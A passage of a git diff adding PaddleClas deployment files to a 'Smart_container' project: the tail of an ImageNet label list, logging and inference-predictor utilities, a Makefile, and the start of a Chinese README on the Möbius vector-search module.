hornbill +94 hummingbird +95 jacamar +96 toucan +97 drake +98 red-breasted merganser, Mergus serrator +99 goose +100 black swan, Cygnus atratus +101 tusker +102 echidna, spiny anteater, anteater +103 platypus, duckbill, duckbilled platypus, duck-billed platypus, Ornithorhynchus anatinus +104 wallaby, brush kangaroo +105 koala, koala bear, kangaroo bear, native bear, Phascolarctos cinereus +106 wombat +107 jellyfish +108 sea anemone, anemone +109 brain coral +110 flatworm, platyhelminth +111 nematode, nematode worm, roundworm +112 conch +113 snail +114 slug +115 sea slug, nudibranch +116 chiton, coat-of-mail shell, sea cradle, polyplacophore +117 chambered nautilus, pearly nautilus, nautilus +118 Dungeness crab, Cancer magister +119 rock crab, Cancer irroratus +120 fiddler crab +121 king crab, Alaska crab, Alaskan king crab, Alaska king crab, Paralithodes camtschatica +122 American lobster, Northern lobster, Maine lobster, Homarus americanus +123 spiny lobster, langouste, rock lobster, crawfish, crayfish, sea crawfish +124 crayfish, crawfish, crawdad, crawdaddy +125 hermit crab +126 isopod +127 white stork, Ciconia ciconia +128 black stork, Ciconia nigra +129 spoonbill +130 flamingo +131 little blue heron, Egretta caerulea +132 American egret, great white heron, Egretta albus +133 bittern +134 crane +135 limpkin, Aramus pictus +136 European gallinule, Porphyrio porphyrio +137 American coot, marsh hen, mud hen, water hen, Fulica americana +138 bustard +139 ruddy turnstone, Arenaria interpres +140 red-backed sandpiper, dunlin, Erolia alpina +141 redshank, Tringa totanus +142 dowitcher +143 oystercatcher, oyster catcher +144 pelican +145 king penguin, Aptenodytes patagonica +146 albatross, mollymawk +147 grey whale, gray whale, devilfish, Eschrichtius gibbosus, Eschrichtius robustus +148 killer whale, killer, orca, grampus, sea wolf, Orcinus orca +149 dugong, Dugong dugon +150 sea lion +151 Chihuahua +152 Japanese spaniel +153 Maltese dog, Maltese terrier, Maltese +154 Pekinese, Pekingese, Peke +155 Shih-Tzu +156 Blenheim spaniel +157 papillon +158 toy terrier +159 Rhodesian ridgeback +160 Afghan hound, Afghan +161 basset, basset hound +162 beagle +163 bloodhound, sleuthhound +164 bluetick +165 black-and-tan coonhound +166 Walker hound, Walker foxhound +167 English foxhound +168 redbone +169 borzoi, Russian wolfhound +170 Irish wolfhound +171 Italian greyhound +172 whippet +173 Ibizan hound, Ibizan Podenco +174 Norwegian elkhound, elkhound +175 otterhound, otter hound +176 Saluki, gazelle hound +177 Scottish deerhound, deerhound +178 Weimaraner +179 Staffordshire bullterrier, Staffordshire bull terrier +180 American Staffordshire terrier, Staffordshire terrier, American pit bull terrier, pit bull terrier +181 Bedlington terrier +182 Border terrier +183 Kerry blue terrier +184 Irish terrier +185 Norfolk terrier +186 Norwich terrier +187 Yorkshire terrier +188 wire-haired fox terrier +189 Lakeland terrier +190 Sealyham terrier, Sealyham +191 Airedale, Airedale terrier +192 cairn, cairn terrier +193 Australian terrier +194 Dandie Dinmont, Dandie Dinmont terrier +195 Boston bull, Boston terrier +196 miniature schnauzer +197 giant schnauzer +198 standard schnauzer +199 Scotch terrier, Scottish terrier, Scottie +200 Tibetan terrier, chrysanthemum dog +201 silky terrier, Sydney silky +202 soft-coated wheaten terrier +203 West Highland white terrier +204 Lhasa, Lhasa apso +205 flat-coated retriever +206 curly-coated retriever +207 golden retriever +208 Labrador retriever +209 Chesapeake Bay retriever +210 German short-haired pointer +211 vizsla, Hungarian pointer +212 English setter +213 Irish setter, red setter +214 Gordon setter +215 Brittany spaniel +216 clumber, clumber spaniel +217 English springer, English springer spaniel +218 Welsh springer spaniel +219 cocker spaniel, English cocker spaniel, cocker +220 Sussex spaniel +221 Irish water spaniel +222 kuvasz +223 schipperke +224 groenendael +225 malinois +226 briard +227 kelpie +228 komondor +229 Old English sheepdog, bobtail +230 Shetland sheepdog, Shetland sheep dog, Shetland +231 collie +232 Border collie +233 Bouvier des Flandres, Bouviers des Flandres +234 Rottweiler +235 German shepherd, German shepherd dog, German police dog, alsatian +236 Doberman, Doberman pinscher +237 miniature pinscher +238 Greater Swiss Mountain dog +239 Bernese mountain dog +240 Appenzeller +241 EntleBucher +242 boxer +243 bull mastiff +244 Tibetan mastiff +245 French bulldog +246 Great Dane +247 Saint Bernard, St Bernard +248 Eskimo dog, husky +249 malamute, malemute, Alaskan malamute +250 Siberian husky +251 dalmatian, coach dog, carriage dog +252 affenpinscher, monkey pinscher, monkey dog +253 basenji +254 pug, pug-dog +255 Leonberg +256 Newfoundland, Newfoundland dog +257 Great Pyrenees +258 Samoyed, Samoyede +259 Pomeranian +260 chow, chow chow +261 keeshond +262 Brabancon griffon +263 Pembroke, Pembroke Welsh corgi +264 Cardigan, Cardigan Welsh corgi +265 toy poodle +266 miniature poodle +267 standard poodle +268 Mexican hairless +269 timber wolf, grey wolf, gray wolf, Canis lupus +270 white wolf, Arctic wolf, Canis lupus tundrarum +271 red wolf, maned wolf, Canis rufus, Canis niger +272 coyote, prairie wolf, brush wolf, Canis latrans +273 dingo, warrigal, warragal, Canis dingo +274 dhole, Cuon alpinus +275 African hunting dog, hyena dog, Cape hunting dog, Lycaon pictus +276 hyena, hyaena +277 red fox, Vulpes vulpes +278 kit fox, Vulpes macrotis +279 Arctic fox, white fox, Alopex lagopus +280 grey fox, gray fox, Urocyon cinereoargenteus +281 tabby, tabby cat +282 tiger cat +283 Persian cat +284 Siamese cat, Siamese +285 Egyptian cat +286 cougar, puma, catamount, mountain lion, painter, panther, Felis concolor +287 lynx, catamount +288 leopard, Panthera pardus +289 snow leopard, ounce, Panthera uncia +290 jaguar, panther, Panthera onca, Felis onca +291 lion, king of beasts, Panthera leo +292 tiger, Panthera tigris +293 cheetah, chetah, Acinonyx jubatus +294 brown bear, bruin, Ursus arctos +295 American black bear, black bear, Ursus americanus, Euarctos americanus +296 ice bear, polar bear, Ursus Maritimus, Thalarctos maritimus +297 sloth bear, Melursus ursinus, Ursus ursinus +298 mongoose +299 meerkat, mierkat +300 tiger beetle +301 ladybug, ladybeetle, lady beetle, ladybird, ladybird beetle +302 ground beetle, carabid beetle +303 long-horned beetle, longicorn, longicorn beetle +304 leaf beetle, chrysomelid +305 dung beetle +306 rhinoceros beetle +307 weevil +308 fly +309 bee +310 ant, emmet, pismire +311 grasshopper, hopper +312 cricket +313 walking stick, walkingstick, stick insect +314 cockroach, roach +315 mantis, mantid +316 cicada, cicala +317 leafhopper +318 lacewing, lacewing fly +319 dragonfly, darning needle, devil's darning needle, sewing needle, snake feeder, snake doctor, mosquito hawk, skeeter hawk +320 damselfly +321 admiral +322 ringlet, ringlet butterfly +323 monarch, monarch butterfly, milkweed butterfly, Danaus plexippus +324 cabbage butterfly +325 sulphur butterfly, sulfur butterfly +326 lycaenid, lycaenid butterfly +327 starfish, sea star +328 sea urchin +329 sea cucumber, holothurian +330 wood rabbit, cottontail, cottontail rabbit +331 hare +332 Angora, Angora rabbit +333 hamster +334 porcupine, hedgehog +335 fox squirrel, eastern fox squirrel, Sciurus niger +336 marmot +337 beaver +338 guinea pig, Cavia cobaya +339 sorrel +340 zebra +341 hog, pig, grunter, squealer, Sus scrofa +342 wild boar, boar, Sus scrofa +343 warthog +344 hippopotamus, hippo, river horse, Hippopotamus amphibius +345 ox +346 water buffalo, water ox, Asiatic buffalo, Bubalus bubalis +347 bison +348 ram, tup +349 bighorn, bighorn sheep, cimarron, Rocky Mountain bighorn, Rocky Mountain sheep, Ovis canadensis +350 ibex, Capra ibex +351 hartebeest +352 impala, Aepyceros melampus +353 gazelle +354 Arabian camel, dromedary, Camelus dromedarius +355 llama +356 weasel +357 mink +358 polecat, fitch, foulmart, foumart, Mustela putorius +359 black-footed ferret, ferret, Mustela nigripes +360 otter +361 skunk, polecat, wood pussy +362 badger +363 armadillo +364 three-toed sloth, ai, Bradypus tridactylus +365 orangutan, orang, orangutang, Pongo pygmaeus +366 gorilla, Gorilla gorilla +367 chimpanzee, chimp, Pan troglodytes +368 gibbon, Hylobates lar +369 siamang, Hylobates syndactylus, Symphalangus syndactylus +370 guenon, guenon monkey +371 patas, hussar monkey, Erythrocebus patas +372 baboon +373 macaque +374 langur +375 colobus, colobus monkey +376 proboscis monkey, Nasalis larvatus +377 marmoset +378 capuchin, ringtail, Cebus capucinus +379 howler monkey, howler +380 titi, titi monkey +381 spider monkey, Ateles geoffroyi +382 squirrel monkey, Saimiri sciureus +383 Madagascar cat, ring-tailed lemur, Lemur catta +384 indri, indris, Indri indri, Indri brevicaudatus +385 Indian elephant, Elephas maximus +386 African elephant, Loxodonta africana +387 lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens +388 giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca +389 barracouta, snoek +390 eel +391 coho, cohoe, coho salmon, blue jack, silver salmon, Oncorhynchus kisutch +392 rock beauty, Holocanthus tricolor +393 anemone fish +394 sturgeon +395 gar, garfish, garpike, billfish, Lepisosteus osseus +396 lionfish +397 puffer, pufferfish, blowfish, globefish +398 abacus +399 abaya +400 academic gown, academic robe, judge's robe +401 accordion, piano accordion, squeeze box +402 acoustic guitar +403 aircraft carrier, carrier, flattop, attack aircraft carrier +404 airliner +405 airship, dirigible +406 altar +407 ambulance +408 amphibian, amphibious vehicle +409 analog clock +410 apiary, bee house +411 apron +412 ashcan, trash can, garbage can, wastebin, ash bin, ash-bin, ashbin, dustbin, trash barrel, trash bin +413 assault rifle, assault gun +414 backpack, back pack, knapsack, packsack, rucksack, haversack +415 bakery, bakeshop, bakehouse +416 balance beam, beam +417 balloon +418 ballpoint, ballpoint pen, ballpen, Biro +419 Band Aid +420 banjo +421 bannister, banister, balustrade, balusters, handrail +422 barbell +423 barber chair +424 barbershop +425 barn +426 barometer +427 barrel, cask +428 barrow, garden cart, lawn cart, wheelbarrow +429 baseball +430 basketball +431 bassinet +432 bassoon +433 bathing cap, swimming cap +434 bath towel +435 bathtub, bathing tub, bath, tub +436 beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon +437 beacon, lighthouse, beacon light, pharos +438 beaker +439 bearskin, busby, shako +440 beer bottle +441 beer glass +442 bell cote, bell cot +443 bib +444 bicycle-built-for-two, tandem bicycle, tandem +445 bikini, two-piece +446 binder, ring-binder +447 binoculars, field glasses, opera glasses +448 birdhouse +449 boathouse +450 bobsled, bobsleigh, bob +451 bolo tie, bolo, bola tie, bola +452 bonnet, poke bonnet +453 bookcase +454 bookshop, bookstore, bookstall +455 bottlecap +456 bow +457 bow tie, bow-tie, bowtie +458 brass, memorial tablet, plaque +459 brassiere, bra, bandeau +460 breakwater, groin, groyne, mole, bulwark, seawall, jetty +461 breastplate, aegis, egis +462 broom +463 bucket, pail +464 buckle +465 bulletproof vest +466 bullet train, bullet +467 butcher shop, meat market +468 cab, hack, taxi, taxicab +469 caldron, cauldron +470 candle, taper, wax light +471 cannon +472 canoe +473 can opener, tin opener +474 cardigan +475 car mirror +476 carousel, carrousel, merry-go-round, roundabout, whirligig +477 carpenter's kit, tool kit +478 carton +479 car wheel +480 cash machine, cash dispenser, automated teller machine, automatic teller machine, automated teller, automatic teller, ATM +481 cassette +482 cassette player +483 castle +484 catamaran +485 CD player +486 cello, violoncello +487 cellular telephone, cellular phone, cellphone, cell, mobile phone +488 chain +489 chainlink fence +490 chain mail, ring mail, mail, chain armor, chain armour, ring armor, ring armour +491 chain saw, chainsaw +492 chest +493 chiffonier, commode +494 chime, bell, gong +495 china cabinet, china closet +496 Christmas stocking +497 church, church building +498 cinema, movie theater, movie theatre, movie house, picture palace +499 cleaver, meat cleaver, chopper +500 cliff dwelling +501 cloak +502 clog, geta, patten, sabot +503 cocktail shaker +504 coffee mug +505 coffeepot +506 coil, spiral, volute, whorl, helix +507 combination lock +508 computer keyboard, keypad +509 confectionery, confectionary, candy store +510 container ship, containership, container vessel +511 convertible +512 corkscrew, bottle screw +513 cornet, horn, trumpet, trump +514 cowboy boot +515 cowboy hat, ten-gallon hat +516 cradle +517 crane +518 crash helmet +519 crate +520 crib, cot +521 Crock Pot +522 croquet ball +523 crutch +524 cuirass +525 dam, dike, dyke +526 desk +527 desktop computer +528 dial telephone, dial phone +529 diaper, nappy, napkin +530 digital clock +531 digital watch +532 dining table, board +533 dishrag, dishcloth +534 dishwasher, dish washer, dishwashing machine +535 disk brake, disc brake +536 dock, dockage, docking facility +537 dogsled, dog sled, dog sleigh +538 dome +539 doormat, welcome mat +540 drilling platform, offshore rig +541 drum, membranophone, tympan +542 drumstick +543 dumbbell +544 Dutch oven +545 electric fan, blower +546 electric guitar +547 electric locomotive +548 entertainment center +549 envelope +550 espresso maker +551 face powder +552 feather boa, boa +553 file, file cabinet, filing cabinet +554 fireboat +555 fire engine, fire truck +556 fire screen, fireguard +557 flagpole, flagstaff +558 flute, transverse flute +559 folding chair +560 football helmet +561 forklift +562 fountain +563 fountain pen +564 four-poster +565 freight car +566 French horn, horn +567 frying pan, frypan, skillet +568 fur coat +569 garbage truck, dustcart +570 gasmask, respirator, gas helmet +571 gas pump, gasoline pump, petrol pump, island dispenser +572 goblet +573 go-kart +574 golf ball +575 golfcart, golf cart +576 gondola +577 gong, tam-tam +578 gown +579 grand piano, grand +580 greenhouse, nursery, glasshouse +581 grille, radiator grille +582 grocery store, grocery, food market, market +583 guillotine +584 hair slide +585 hair spray +586 half track +587 hammer +588 hamper +589 hand blower, blow dryer, blow drier, hair dryer, hair drier +590 hand-held computer, hand-held microcomputer +591 handkerchief, hankie, hanky, hankey +592 hard disc, hard disk, fixed disk +593 harmonica, mouth organ, harp, mouth harp +594 harp +595 harvester, reaper +596 hatchet +597 holster +598 home theater, home theatre +599 honeycomb +600 hook, claw +601 hoopskirt, crinoline +602 horizontal bar, high bar +603 horse cart, horse-cart +604 hourglass +605 iPod +606 iron, smoothing iron +607 jack-o'-lantern +608 jean, blue jean, denim +609 jeep, landrover +610 jersey, T-shirt, tee shirt +611 jigsaw puzzle +612 jinrikisha, ricksha, rickshaw +613 joystick +614 kimono +615 knee pad +616 knot +617 lab coat, laboratory coat +618 ladle +619 lampshade, lamp shade +620 laptop, laptop computer +621 lawn mower, mower +622 lens cap, lens cover +623 letter opener, paper knife, paperknife +624 library +625 lifeboat +626 lighter, light, igniter, ignitor +627 limousine, limo +628 liner, ocean liner +629 lipstick, lip rouge +630 Loafer +631 lotion +632 loudspeaker, speaker, speaker unit, loudspeaker system, speaker system +633 loupe, jeweler's loupe +634 lumbermill, sawmill +635 magnetic compass +636 mailbag, postbag +637 mailbox, letter box +638 maillot +639 maillot, tank suit +640 manhole cover +641 maraca +642 marimba, xylophone +643 mask +644 matchstick +645 maypole +646 maze, labyrinth +647 measuring cup +648 medicine chest, medicine cabinet +649 megalith, megalithic structure +650 microphone, mike +651 microwave, microwave oven +652 military uniform +653 milk can +654 minibus +655 miniskirt, mini +656 minivan +657 missile +658 mitten +659 mixing bowl +660 mobile home, manufactured home +661 Model T +662 modem +663 monastery +664 monitor +665 moped +666 mortar +667 mortarboard +668 mosque +669 mosquito net +670 motor scooter, scooter +671 mountain bike, all-terrain bike, off-roader +672 mountain tent +673 mouse, computer mouse +674 mousetrap +675 moving van +676 muzzle +677 nail +678 neck brace +679 necklace +680 nipple +681 notebook, notebook computer +682 obelisk +683 oboe, hautboy, hautbois +684 ocarina, sweet potato +685 odometer, hodometer, mileometer, milometer +686 oil filter +687 organ, pipe organ +688 oscilloscope, scope, cathode-ray oscilloscope, CRO +689 overskirt +690 oxcart +691 oxygen mask +692 packet +693 paddle, boat paddle +694 paddlewheel, paddle wheel +695 padlock +696 paintbrush +697 pajama, pyjama, pj's, jammies +698 palace +699 panpipe, pandean pipe, syrinx +700 paper towel +701 parachute, chute +702 parallel bars, bars +703 park bench +704 parking meter +705 passenger car, coach, carriage +706 patio, terrace +707 pay-phone, pay-station +708 pedestal, plinth, footstall +709 pencil box, pencil case +710 pencil sharpener +711 perfume, essence +712 Petri dish +713 photocopier +714 pick, plectrum, plectron +715 pickelhaube +716 picket fence, paling +717 pickup, pickup truck +718 pier +719 piggy bank, penny bank +720 pill bottle +721 pillow +722 ping-pong ball +723 pinwheel +724 pirate, pirate ship +725 pitcher, ewer +726 plane, carpenter's plane, woodworking plane +727 planetarium +728 plastic bag +729 plate rack +730 plow, plough +731 plunger, plumber's helper +732 Polaroid camera, Polaroid Land camera +733 pole +734 police van, police wagon, paddy wagon, patrol wagon, wagon, black Maria +735 poncho +736 pool table, billiard table, snooker table +737 pop bottle, soda bottle +738 pot, flowerpot +739 potter's wheel +740 power drill +741 prayer rug, prayer mat +742 printer +743 prison, prison house +744 projectile, missile +745 projector +746 puck, hockey puck +747 punching bag, punch bag, punching ball, punchball +748 purse +749 quill, quill pen +750 quilt, comforter, comfort, puff +751 racer, race car, racing car +752 racket, racquet +753 radiator +754 radio, wireless +755 radio telescope, radio reflector +756 rain barrel +757 recreational vehicle, RV, R.V. +758 reel +759 reflex camera +760 refrigerator, icebox +761 remote control, remote +762 restaurant, eating house, eating place, eatery +763 revolver, six-gun, six-shooter +764 rifle +765 rocking chair, rocker +766 rotisserie +767 rubber eraser, rubber, pencil eraser +768 rugby ball +769 rule, ruler +770 running shoe +771 safe +772 safety pin +773 saltshaker, salt shaker +774 sandal +775 sarong +776 sax, saxophone +777 scabbard +778 scale, weighing machine +779 school bus +780 schooner +781 scoreboard +782 screen, CRT screen +783 screw +784 screwdriver +785 seat belt, seatbelt +786 sewing machine +787 shield, buckler +788 shoe shop, shoe-shop, shoe store +789 shoji +790 shopping basket +791 shopping cart +792 shovel +793 shower cap +794 shower curtain +795 ski +796 ski mask +797 sleeping bag +798 slide rule, slipstick +799 sliding door +800 slot, one-armed bandit +801 snorkel +802 snowmobile +803 snowplow, snowplough +804 soap dispenser +805 soccer ball +806 sock +807 solar dish, solar collector, solar furnace +808 sombrero +809 soup bowl +810 space bar +811 space heater +812 space shuttle +813 spatula +814 speedboat +815 spider web, spider's web +816 spindle +817 sports car, sport car +818 spotlight, spot +819 stage +820 steam locomotive +821 steel arch bridge +822 steel drum +823 stethoscope +824 stole +825 stone wall +826 stopwatch, stop watch +827 stove +828 strainer +829 streetcar, tram, tramcar, trolley, trolley car +830 stretcher +831 studio couch, day bed +832 stupa, tope +833 submarine, pigboat, sub, U-boat +834 suit, suit of clothes +835 sundial +836 sunglass +837 sunglasses, dark glasses, shades +838 sunscreen, sunblock, sun blocker +839 suspension bridge +840 swab, swob, mop +841 sweatshirt +842 swimming trunks, bathing trunks +843 swing +844 switch, electric switch, electrical switch +845 syringe +846 table lamp +847 tank, army tank, armored combat vehicle, armoured combat vehicle +848 tape player +849 teapot +850 teddy, teddy bear +851 television, television system +852 tennis ball +853 thatch, thatched roof +854 theater curtain, theatre curtain +855 thimble +856 thresher, thrasher, threshing machine +857 throne +858 tile roof +859 toaster +860 tobacco shop, tobacconist shop, tobacconist +861 toilet seat +862 torch +863 totem pole +864 tow truck, tow car, wrecker +865 toyshop +866 tractor +867 trailer truck, tractor trailer, trucking rig, rig, articulated lorry, semi +868 tray +869 trench coat +870 tricycle, trike, velocipede +871 trimaran +872 tripod +873 triumphal arch +874 trolleybus, trolley coach, trackless trolley +875 trombone +876 tub, vat +877 turnstile +878 typewriter keyboard +879 umbrella +880 unicycle, monocycle +881 upright, upright piano +882 vacuum, vacuum cleaner +883 vase +884 vault +885 velvet +886 vending machine +887 vestment +888 viaduct +889 violin, fiddle +890 volleyball +891 waffle iron +892 wall clock +893 wallet, billfold, notecase, pocketbook +894 wardrobe, closet, press +895 warplane, military plane +896 washbasin, handbasin, washbowl, lavabo, wash-hand basin +897 washer, automatic washer, washing machine +898 water bottle +899 water jug +900 water tower +901 whiskey jug +902 whistle +903 wig +904 window screen +905 window shade +906 Windsor tie +907 wine bottle +908 wing +909 wok +910 wooden spoon +911 wool, woolen, woollen +912 worm fence, snake fence, snake-rail fence, Virginia fence +913 wreck +914 yawl +915 yurt +916 web site, website, internet site, site +917 comic book +918 crossword puzzle, crossword +919 street sign +920 traffic light, traffic signal, stoplight +921 book jacket, dust cover, dust jacket, dust wrapper +922 menu +923 plate +924 guacamole +925 consomme +926 hot pot, hotpot +927 trifle +928 ice cream, icecream +929 ice lolly, lolly, lollipop, popsicle +930 French loaf +931 bagel, beigel +932 pretzel +933 cheeseburger +934 hotdog, hot dog, red hot +935 mashed potato +936 head cabbage +937 broccoli +938 cauliflower +939 zucchini, courgette +940 spaghetti squash +941 acorn squash +942 butternut squash +943 cucumber, cuke +944 artichoke, globe artichoke +945 bell pepper +946 cardoon +947 mushroom +948 Granny Smith +949 strawberry +950 orange +951 lemon +952 fig +953 pineapple, ananas +954 banana +955 jackfruit, jak, jack +956 custard apple +957 pomegranate +958 hay +959 carbonara +960 chocolate sauce, chocolate syrup +961 dough +962 meat loaf, meatloaf +963 pizza, pizza pie +964 potpie +965 burrito +966 red wine +967 espresso +968 cup +969 eggnog +970 alp +971 bubble +972 cliff, drop, drop-off +973 coral reef +974 geyser +975 lakeside, lakeshore +976 promontory, headland, head, foreland +977 sandbar, sand bar +978 seashore, coast, seacoast, sea-coast +979 valley, vale +980 volcano +981 ballplayer, baseball player +982 groom, bridegroom +983 scuba diver +984 rapeseed +985 daisy +986 yellow lady's slipper, yellow lady-slipper, Cypripedium calceolus, Cypripedium parviflorum +987 corn +988 acorn +989 hip, rose hip, rosehip +990 buckeye, horse chestnut, conker +991 coral fungus +992 agaric +993 gyromitra +994 stinkhorn, carrion fungus +995 earthstar +996 hen-of-the-woods, hen of the woods, Polyporus frondosus, Grifola frondosa +997 bolete +998 ear, spike, capitulum +999 toilet tissue, toilet paper, bathroom tissue diff --git a/Smart_container/PaddleClas/deploy/utils/logger.py b/Smart_container/PaddleClas/deploy/utils/logger.py new file mode 100644 index 0000000..ece8526 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/logger.py @@ -0,0 +1,120 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import logging +import os +import datetime + +logging.basicConfig( + level=logging.INFO, + format="%(asctime)s %(levelname)s: %(message)s", + datefmt="%Y-%m-%d %H:%M:%S") + + +def time_zone(sec, fmt): + real_time = datetime.datetime.now() + return real_time.timetuple() + + +logging.Formatter.converter = time_zone +_logger = logging.getLogger(__name__) + +Color = { + 'RED': '\033[31m', + 'HEADER': '\033[35m', # deep purple + 'PURPLE': '\033[95m', # purple + 'OKBLUE': '\033[94m', + 'OKGREEN': '\033[92m', + 'WARNING': '\033[93m', + 'FAIL': '\033[91m', + 'ENDC': '\033[0m' +} + + +def coloring(message, color="OKGREEN"): + assert color in Color.keys() + if os.environ.get('PADDLECLAS_COLORING', False): + return Color[color] + str(message) + Color["ENDC"] + else: + return message + + +def anti_fleet(log): + """ + logs will print multi-times when calling Fleet API. + Only display single log and ignore the others. + """ + + def wrapper(fmt, *args): + if int(os.getenv("PADDLE_TRAINER_ID", 0)) == 0: + log(fmt, *args) + + return wrapper + + +@anti_fleet +def info(fmt, *args): + _logger.info(fmt, *args) + + +@anti_fleet +def warning(fmt, *args): + _logger.warning(coloring(fmt, "RED"), *args) + + +@anti_fleet +def error(fmt, *args): + _logger.error(coloring(fmt, "FAIL"), *args) + + +def scaler(name, value, step, writer): + """ + This function will draw a scalar curve generated by the visualdl. + Usage: Install visualdl: pip3 install visualdl==2.0.0b4 + and then: + visualdl --logdir ./scalar --host 0.0.0.0 --port 8830 + to preview loss corve in real time. + """ + writer.add_scalar(tag=name, step=step, value=value) + + +def advertise(): + """ + Show the advertising message like the following: + + =========================================================== + == PaddleClas is powered by PaddlePaddle ! == + =========================================================== + == == + == For more info please go to the following website. == + == == + == https://github.com/PaddlePaddle/PaddleClas == + =========================================================== + + """ + copyright = "PaddleClas is powered by PaddlePaddle !" + ad = "For more info please go to the following website." + website = "https://github.com/PaddlePaddle/PaddleClas" + AD_LEN = 6 + len(max([copyright, ad, website], key=len)) + + info( + coloring("\n{0}\n{1}\n{2}\n{3}\n{4}\n{5}\n{6}\n{7}\n".format( + "=" * (AD_LEN + 4), + "=={}==".format(copyright.center(AD_LEN)), + "=" * (AD_LEN + 4), + "=={}==".format(' ' * AD_LEN), + "=={}==".format(ad.center(AD_LEN)), + "=={}==".format(' ' * AD_LEN), + "=={}==".format(website.center(AD_LEN)), + "=" * (AD_LEN + 4), ), "RED")) diff --git a/Smart_container/PaddleClas/deploy/utils/predictor.py b/Smart_container/PaddleClas/deploy/utils/predictor.py new file mode 100644 index 0000000..11f1530 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/predictor.py @@ -0,0 +1,70 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import os +import argparse +import base64 +import shutil +import cv2 +import numpy as np + +from paddle.inference import Config +from paddle.inference import create_predictor + + +class Predictor(object): + def __init__(self, args, inference_model_dir=None): + # HALF precission predict only work when using tensorrt + if args.use_fp16 is True: + assert args.use_tensorrt is True + self.args = args + self.paddle_predictor, self.config = self.create_paddle_predictor( + args, inference_model_dir) + + def predict(self, image): + raise NotImplementedError + + def create_paddle_predictor(self, args, inference_model_dir=None): + if inference_model_dir is None: + inference_model_dir = args.inference_model_dir + params_file = os.path.join(inference_model_dir, "inference.pdiparams") + model_file = os.path.join(inference_model_dir, "inference.pdmodel") + config = Config(model_file, params_file) + + if args.use_gpu: + config.enable_use_gpu(args.gpu_mem, 0) + else: + config.disable_gpu() + if args.enable_mkldnn: + # cache 10 different shapes for mkldnn to avoid memory leak + config.set_mkldnn_cache_capacity(10) + config.enable_mkldnn() + config.set_cpu_math_library_num_threads(args.cpu_num_threads) + + if args.enable_profile: + config.enable_profile() + config.disable_glog_info() + config.switch_ir_optim(args.ir_optim) # default true + if args.use_tensorrt: + config.enable_tensorrt_engine( + precision_mode=Config.Precision.Half + if args.use_fp16 else Config.Precision.Float32, + max_batch_size=args.batch_size, + min_subgraph_size=30) + + config.enable_memory_optim() + # use zero copy + config.switch_use_feed_fetch_ops(False) + predictor = create_predictor(config) + + return predictor, config diff --git a/Smart_container/PaddleClas/deploy/utils/simfang.ttf b/Smart_container/PaddleClas/deploy/utils/simfang.ttf new file mode 100644 index 0000000..2b59eae Binary files /dev/null and b/Smart_container/PaddleClas/deploy/utils/simfang.ttf differ diff --git a/Smart_container/PaddleClas/deploy/vector_search/Makefile b/Smart_container/PaddleClas/deploy/vector_search/Makefile new file mode 100644 index 0000000..ec2df59 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/Makefile @@ -0,0 +1,15 @@ +CXX=g++ + +ifeq ($(OS),Windows_NT) + postfix=dll +else + postfix=so +endif + +all : index + +index : src/config.h src/graph.h src/data.h interface.cc + ${CXX} -shared -fPIC interface.cc -o index.${postfix} -std=c++11 -Ofast -march=native -g -flto -funroll-loops -DOMP -fopenmp + +clean : + rm index.${postfix} \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/vector_search/README.md b/Smart_container/PaddleClas/deploy/vector_search/README.md new file mode 100644 index 0000000..afa1dc2 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/README.md @@ -0,0 +1,93 @@ +# 向量检索 + +**注意**:由于系统适配性问题,在新版本中,此检索算法将被废弃。新版本中将使用[faiss](https://github.com/facebookresearch/faiss),整体检索的过程保持不变,但建立索引及检索时的yaml文件有所修改。 +## 1. 简介 + +一些垂域识别任务(如车辆、商品等)需要识别的类别数较大,往往采用基于检索的方式,通过查询向量与底库向量进行快速的最近邻搜索,获得匹配的预测类别。向量检索模块提供基础的近似最近邻搜索算法,基于百度自研的Möbius算法,一种基于图的近似最近邻搜索算法,用于最大内积搜索 (MIPS)。 该模块提供python接口,支持numpy和 tensor类型向量,支持L2和Inner Product距离计算。 + +Mobius 算法细节详见论文 ([Möbius Transformation for Fast Inner Product Search on Graph](http://research.baidu.com/Public/uploads/5e189d36b5cf6.PDF), [Code](https://github.com/sunbelbd/mobius)) + + + +## 2. 安装 + +### 2.1 直接使用提供的库文件 + +该文件夹下有已经编译好的`index.so`(gcc8.2.0下编译,用于Linux)以及`index.dll`(gcc10.3.0下编译,用于Windows),可以跳过2.2与2.3节,直接使用。 + +如果因为gcc版本过低或者环境不兼容的问题,导致库文件无法使用,则需要在不同的平台下手动编译库文件。 + +**注意:** +请确保您的 C++ 编译器支持 C++11 标准。 + + +### 2.2 Linux上编译生成库文件 + +运行下面的命令,安装gcc与g++。 + +```shell +sudo apt-get update +sudo apt-get upgrade -y +sudo apt-get install build-essential gcc g++ +``` + +可以通过命令`gcc -v`查看gcc版本。 + +进入该文件夹,直接运行`make`即可,如果希望重新生成`index.so`文件,可以首先使用`make clean`清除已经生成的缓存,再使用`make`生成更新之后的库文件。 + +### 2.3 Windows上编译生成库文件 + 